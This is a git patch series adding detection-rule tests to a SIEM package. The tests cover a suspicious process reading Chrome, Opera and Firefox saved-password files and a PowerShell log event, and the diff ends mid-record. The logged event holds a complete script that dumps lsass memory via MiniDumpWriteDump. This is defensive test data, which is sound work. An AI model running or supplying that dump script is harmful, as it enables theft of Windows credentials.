a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_3.sc new file mode 100644 index 00000000..5473a193 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_3.sc 
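Review bot: The line `# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` is the scaffolding placeholder ("your test goes here; in expect state how many and which correlation events you expect") and was committed unchanged. Replace it with a comment that names the case, e.g. `# Opera 'Login Data' read by a non-browser process (wsus.exe) -> one incident`, so the file documents what it covers. The same placeholder appears in test_3.sc of this commit.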
@@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:50.1342936Z\"},\"EventRecordID\":\"4991\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"44\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": 
"application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:29:07.076Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:50.134Z", "type": "raw", "uuid": "4a7b9e8d-94c2-44ac-8d9d-949bc09eb63a"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "read", "alert.context": "iewin7\\ieuser read 'c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\login data' on iewin7", "alert.key": "C:\\Users\\Defau1t\\wsus.exe", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores", "correlation_name": "Chrome_firefox_opera_cred_read", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "medium", "object": "file", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\"} \ No newline at end of file diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc new file mode 100644 index 00000000..61caf538 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Chrome_firefox_opera_cred_read/tests/test_4.sc 
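Review bot: The Chrome case only covers `User Data\Default\Login Data`; Chrome keeps additional profiles under `User Data\Profile N\`, and Chromium-based browsers with the same file layout (Edge, Brave) live under different vendor directories, so if the rule matches the path prefix literally this test hides the gap. Add an event with `ObjectName` ending in `\User Data\Profile 1\Login Data` and the same expectation, and, if other Chromium browsers are meant to be in scope, one under `Microsoft\Edge\User Data\Default\`. The placeholder comment `# Тут будет твой тест. В секции expect укажи ...` should be replaced with a description of the case, e.g. `# Chrome default-profile 'Login Data' read by wsus.exe -> one incident`.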
@@ -0,0 +1,6 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:31:15.3550630Z\"},\"EventRecordID\":\"4988\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"68\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Opera Software\\\\Opera Stable\\\\Login Data\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": 
"application/x-pt-eventlog", "msgid": "4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\opera software\\opera stable\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:31:15.355Z", "type": "raw", "uuid": "eda762de-8d4c-48c4-b2ef-5d83de983989"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:05.3081880Z\"},\"EventRecordID\":\"4989\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\kushu3sd.default\\\\key4.db\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": 
"4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\key4.db", "object.name": "key4.db", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:05.308Z", "type": "raw", "uuid": "98dd326b-88cf-48b9-8ba1-513fcee3c845"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:18.6997552Z\"},\"EventRecordID\":\"4990\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"56\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\kushu3sd.default\\\\logins.json\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": 
"4663", "normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\logins.json", "object.name": "logins.json", "object.path": "c:\\users\\ieuser\\appdata\\roaming\\mozilla\\firefox\\profiles\\kushu3sd.default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:18.699Z", "type": "raw", "uuid": "66323e2c-df36-488d-8914-e739970cd231"} +{"action": "access", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4663\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"12800\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T19:33:50.1342936Z\"},\"EventRecordID\":\"4991\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"4\",\"ThreadID\":\"44\"},\"Channel\":\"Security\",\"Computer\":\"IEWIN7\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-3583694148-1414552638-2922671848-1000\"},{\"Name\":\"SubjectUserName\",\"text\":\"IEUser\"},{\"Name\":\"SubjectDomainName\",\"text\":\"IEWIN7\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0xffa8\"},{\"Name\":\"ObjectServer\",\"text\":\"Security\"},{\"Name\":\"ObjectType\",\"text\":\"File\"},{\"Name\":\"ObjectName\",\"text\":\"C:\\\\Users\\\\IEUser\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\User Data\\\\Default\\\\Login Data\"},{\"Name\":\"HandleId\",\"text\":\"0x50\"},{\"Name\":\"AccessList\",\"text\":\"%%4416\"},{\"Name\":\"AccessMask\",\"text\":\"0x1\"},{\"Name\":\"ProcessId\",\"text\":\"0x134c\"},{\"Name\":\"ProcessName\",\"text\":\"C:\\\\Users\\\\Defau1t\\\\wsus.exe\"}]}}}", "category.generic": "File System Object", "category.high": "System Management", "category.low": "Manipulation", "datafield1": "0x50", "datafield5": "0x1", "event_src.category": "Operating system", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4663_An_attempt_was_made_to_access_an_object", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4663", 
"normalized": true, "object": "file_object", "object.fullpath": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\login data", "object.name": "login data", "object.path": "c:\\users\\ieuser\\appdata\\local\\google\\chrome\\user data\\default\\", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-04T13:34:14.538Z", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", "subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T19:33:50.134Z", "type": "raw", "uuid": "bed7249b-e9ad-4925-ac6d-1dfa9cf3582e"} + +expect 4 {"action": "read", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores", "correlation_name": "Chrome_firefox_opera_cred_read", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "correlationengine", "importance": "medium", "object": "file", "object.property": "GrantedAccess", "object.type": "file", "object.value": "0x1", "status": "success", "subject": "account", "subject.account.domain": "iewin7", "subject.account.id": "S-1-5-21-3583694148-1414552638-2922671848-1000", "subject.account.name": "ieuser", "subject.account.privileges": "%%4416", "subject.account.session_id": "65448", "subject.process.fullpath": "C:\\Users\\Defau1t\\wsus.exe", 
"subject.process.id": "4940", "subject.process.name": "wsus.exe", "subject.process.path": "C:\\Users\\Defau1t\\"}
\ No newline at end of file
From b14976a964c7d234605ac41cbf69986b172337bf Mon Sep 17 00:00:00 2001
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Thu, 27 Jul 2023 13:46:20 +0300
Subject: [PATCH 04/57] =?UTF-8?q?=D0=A0=D0=B0=D1=81=D1=88=D0=B8=D1=80?= =?UTF-8?q?=D0=B8=D0=BB=20=D0=BF=D0=BE=D0=BB=D1=8F=20=D0=B4=D0=B0=D0=BD?= =?UTF-8?q?=D0=BD=D1=8B=D1=85=20=D0=BA=D0=BE=D1=82=D0=BE=D1=80=D1=8B=D0=B5?= =?UTF-8?q?=20=D0=BC=D1=8B=20=D0=BE=D0=B6=D0=B8=D0=B4=D0=B0=D0=B5=D0=BC=20?= =?UTF-8?q?=D0=B4=D0=BB=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0?= =?UTF-8?q?=20(Credentials=5FMiniDumpWriteDump=5FLsass)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../Credentials_MiniDumpWriteDump_Lsass/tests/test_1.sc | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Credentials_MiniDumpWriteDump_Lsass/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Credentials_MiniDumpWriteDump_Lsass/tests/test_1.sc
index 744c83fd..31731af3 100644
--- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Credentials_MiniDumpWriteDump_Lsass/tests/test_1.sc
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Credentials_MiniDumpWriteDump_Lsass/tests/test_1.sc
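Review bot: The `expect 4` block omits `alert.key`, although `subject.process.fullpath` is identical in all four events and the preceding hunk for the same rule pins it as `"alert.key": "C:\\Users\\Defau1t\\wsus.exe"`; adding that field here keeps the test from passing if the rule's key ever changes to the per-event file path or to an empty value. The block also asserts `"generator.type": "correlationengine"`, which the preceding hunk's expect does not, so the two tests currently check slightly different contracts for one rule; align them. All four samples are positive cases from a single non-browser process, so if none of the rule's other tests has a browser process reading its own credential store with `expect 0`, the false-positive boundary of the rule is unpinned.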
@@ -1,4 +1,4 @@ {"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2020-06-30T14:24:08.2546050Z\"},\"EventRecordID\":\"971\",\"Correlation\":{\"ActivityID\":\"{4aa5eae3-4f33-0001-3a2b-a64a334fd601}\"},\"Execution\":{\"ProcessID\":\"7008\",\"ThreadID\":\"6488\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"MSEDGEWIN10\",\"Security\":{\"UserID\":\"S-1-5-21-3461203602-4096304019-2269080069-1000\"}},\"EventData\":{\"Data\":[{\"Name\":\"MessageNumber\",\"text\":\"1\"},{\"Name\":\"MessageTotal\",\"text\":\"1\"},{\"Name\":\"ScriptBlockText\",\"text\":\"function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = \\\"$($ProcessName).dmp\\\" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = \\\"$($Exception.Message) ($($ProcessName):$($ProcessId))\\\" # Remove any partially written dump files. 
For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { \\\"Memdump complete!\\\" } }\"},{\"Name\":\"ScriptBlockId\",\"text\":\"27f08bda-c330-419f-b83b-eb5c0f699930\"},{\"Name\":\"Path\",\"text\":\"C:\\\\Users\\\\Public\\\\lsass_wer_ps.ps1\"}]}}}", "category.generic": "Command", "category.high": "System Management", "category.low": "Manipulation", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Common_PowerShell_4104_Command_executed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4104", "normalized": true, "numfield1": 1, "numfield2": 1, "object": "command", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.fullpath": "C:\\Users\\Public\\lsass_wer_ps.ps1", "object.id": "27f08bda-c330-419f-b83b-eb5c0f699930", "object.name": "lsass_wer_ps.ps1", "object.path": "C:\\Users\\Public\\", "object.process.cmdline": "function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = \"$($ProcessName).dmp\" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName 
$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { \"Memdump complete!\" } }", "object.process.id": "7008", "object.value": "function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = \"$($ProcessName).dmp\" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. 
Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { \"Memdump complete!\" } }", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-12T09:58:08.329Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2020-06-30T14:24:08.254Z", "type": "raw", "uuid": "7cced0b4-cdac-49c8-aaa6-5ea771e45623"} # Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь -expect 1 {"correlation_name": "Credentials_MiniDumpWriteDump_Lsass"} \ No newline at end of file +expect 1 {"action": "execute", "alert.context": "function memory($path) { $process = get-process lsass $dumpfilepath = $path $wer = [psobject].assembly.gettype('system.management.automation.windowserrorreporting') $wernativemethods = $wer.getnestedtype('nativemethods', 'nonpublic') $flags = [reflection.bindingflags] 'nonpublic, static' $minidumpwritedump = $wernativemethods.getmethod('minidumpwritedump', $flags) $minidumpwithfullmemory = [uint32] 2 # $processid = $process.id $processname = $process.name $processhandle = $process.handle $processfilename = 